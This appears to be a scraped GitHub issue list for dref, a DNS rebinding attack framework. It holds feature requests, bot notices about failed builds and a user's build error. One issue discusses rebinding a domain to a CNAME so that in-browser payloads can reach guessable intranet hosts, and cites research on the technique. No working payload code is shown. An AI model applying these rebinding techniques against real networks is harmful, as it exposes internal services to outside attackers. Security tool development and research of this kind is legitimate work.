fsecurelabs / dref Goto Github PK

Want to build the dref-cli binary on tagged commits:

https://blog.questionable.services/article/build-go-binaries-travis-ci-github/

Should check if users are passing a Content-Type header when calling the framework's and network.post() to allow users to post arbitrary content (JSON, octet-stream etc.)

The first request after a rebind will occasionally still hit dref instead of the target.

I think a one or two second delay before resolving triggerRebind() could solve this.

The dns app can be dockerized.

The image should be pushed to Dockerhub on tag builds.

At the moment we'll keep the configuration loading as is (YAML) but in the future we should load required params (address and domain) from env vars.

The devDependency eslint-plugin-import was updated from 2.15.0 to 2.16.0.

🚨 View failing branch.

This version is covered by your current version range and after updating it in your project the build failed.

eslint-plugin-import is a devDependency of this project. It might not break your production code or affect downstream projects, but probably breaks your build or test tools, which may prevent deploying or publishing.

Your Greenkeeper Bot 🌴

Only ./dref/dns/ has test cases at the moment.

Adding tests across the repo is in progress.

dref-cli should offer ability to install and set up dref on a remote host:

$ dref install -u root -h 1.2.3.4 -d attacker.com
which git
which docker
which docker-compose
git clone dref
export $DREF_MONGO_HOST=mongo
export $DREF_DOMAIN=attacker.com
export $DREF_ADDRESS=1.2.3.4
docker-compose up

Shields currently pointing to another repo. Waiting on integrations to update URLs.

Proxies can mess with the tool's capabilities (or lead to interesting findings?).

If a user is behind a proxy, the dref in-browser payloads won't be able to hit services that are accessible to the user workstation if the proxy can't hit them.

TL;DR the context for attacks becomes the context of the proxy, not the workstation.

As a starter, it would be nice to just detect when the user is behind a proxy.

Maybe some ideas here:

https://www.blackhat.com/docs/us-14/materials/us-14-Williams-I-Know-Your-Filtering-Policy-Better-Than-You-Do.pdf
https://www.blackhat.com/docs/us-14/materials/us-14-Williams-I-Know-Your-Filtering-Policy-Better-Than-You-Do-wp2.pdf

Hello,

I was wondering if it would be possible to add support to rebind a domain to a cname. That would allow an attacker to access some internal hosts without knowing the internal IP address, p.e. wiki.companydomain.com.

This technique is described in this paper:
https://crypto.stanford.edu/dns/dns-rebinding.pdf

Spidering the Intranet. 
The attacker need not specify 
the target machine by IP address. Instead, the attacker
can guess the internal host name of the target, for example
hr.corp.company.com, and rebind attacker.com to a CNAME
record pointing to that host name. The client’s own recursive DNS resolver will complete the resolution and return
the IP address of the target. Intranet host names are often
guessable and occasionally disclosed publicly [30, 9]. This
technique obviates the need for the attacker to scan IP addresses to find an interesting target but does not work with
the multiple A record technique described in Section 3.1.

https://sinister.ly/Thread-DNS-Rebinding-Attack

i would really like to read your response .
Thanks
wish you a good day :)

Implement a primitive version of the dref-cli, probably using golang (ie: single compiled binary to download to admin dref from a machine)

targets example

$ dref get targets
NAME   SCRIPT  HANG  FASTREBIND  ARGS
sysinfo  sysinfo   false    false               {json snippet as string (ie: 30 chars)}

$ dref get target sysinfo
{raw json formatted}

logs example

$ dref get logs --target sysinfo
...

$ dref get log 507f1f77bcf86cd799439011
...

The dependency mongoose was updated from 5.4.13 to 5.4.14.

🚨 View failing branch.

This version is covered by your current version range and after updating it in your project the build failed.

mongoose is a direct dependency of this project, and it is very likely causing it to break. If other packages depend on yours, this update is probably also breaking those in turn.

Your Greenkeeper Bot 🌴

Version 2.1.2 of atob was just published.

This version is covered by your current version range and after updating it in your project the build failed.

atob is a direct dependency of this project, and it is very likely causing it to break. If other packages depend on yours, this update is probably also breaking those in turn.

Your Greenkeeper Bot 🌴

Version 1.9.4 of mongodb-memory-server was just published.

This version is covered by your current version range and after updating it in your project the build failed.

mongodb-memory-server is a devDependency of this project. It might not break your production code or affect downstream projects, but probably breaks your build or test tools, which may prevent deploying or publishing.

Your Greenkeeper Bot 🌴

Hi,
Trying to run this on Ubuntu 16.04. The following is from my docker-compose version:

docker-compose version 1.21.2, build a133471
docker-py version: 3.3.0
CPython version: 3.6.5
OpenSSL version: OpenSSL 1.0.1t  3 May 2016

and Docker:

 Engine:
  Version:      18.05.0-ce
  API version:  1.37 (minimum version 1.12)
  Go version:   go1.9.5
  Git commit:   f150324
  Built:        Wed May  9 22:14:32 2018
  OS/Arch:      linux/amd64
  Experimental: false

It seems like my DNS is configured correctly. I am able to dig a random subdomain and get my IP address back. When I go to build the image, I get the following error:

scripts_1  | [./src/libs/crypto.js] 1.59 KiB {web-discover} {sysinfo} [built] [1 error]
scripts_1  | [./src/libs/network.js] 2.41 KiB {web-discover} {sysinfo} [built]
scripts_1  | [./src/libs/session.js] 2.15 KiB {web-discover} {sysinfo} [built]
scripts_1  | [./src/payloads/sysinfo.js] 1.58 KiB {sysinfo} [built]
scripts_1  | [./src/payloads/web-discover.js] 1.12 KiB {web-discover} [built]
scripts_1  |     + 13 hidden modules
scripts_1  | 
scripts_1  | ERROR in ./src/libs/crypto.js
scripts_1  | Module Error (from ./node_modules/eslint-loader/index.js):
scripts_1  | 
scripts_1  | /src/src/libs/crypto.js
scripts_1  |    5:3  error  Trailing spaces not allowed  no-trailing-spaces
scripts_1  |    8:3  error  Trailing spaces not allowed  no-trailing-spaces
scripts_1  |   11:3  error  Trailing spaces not allowed  no-trailing-spaces
scripts_1  | 
scripts_1  | ✖ 3 problems (3 errors, 0 warnings)
scripts_1  |   3 errors, 0 warnings potentially fixable with the `--fix` option.
scripts_1  | 
scripts_1  |  @ ./src/libs/session.js 1:0-34 6:21-37 7:22-32 7:49-65 26:21-31 33:19-35
scripts_1  |  @ ./src/payloads/sysinfo.js
scripts_1  | ℹ ｢wdm｣: Failed to compile.

Thanks

• CREATE target
• GET targets
• GET target (by name)
• DELETE target (by name)

The dependency nodemon was updated from 1.18.5 to 1.18.6.

🚨 View failing branch.

This version is covered by your current version range and after updating it in your project the build failed.

nodemon is a direct dependency of this project, and it is very likely causing it to break. If other packages depend on yours, this update is probably also breaking those in turn.

Your Greenkeeper Bot 🌴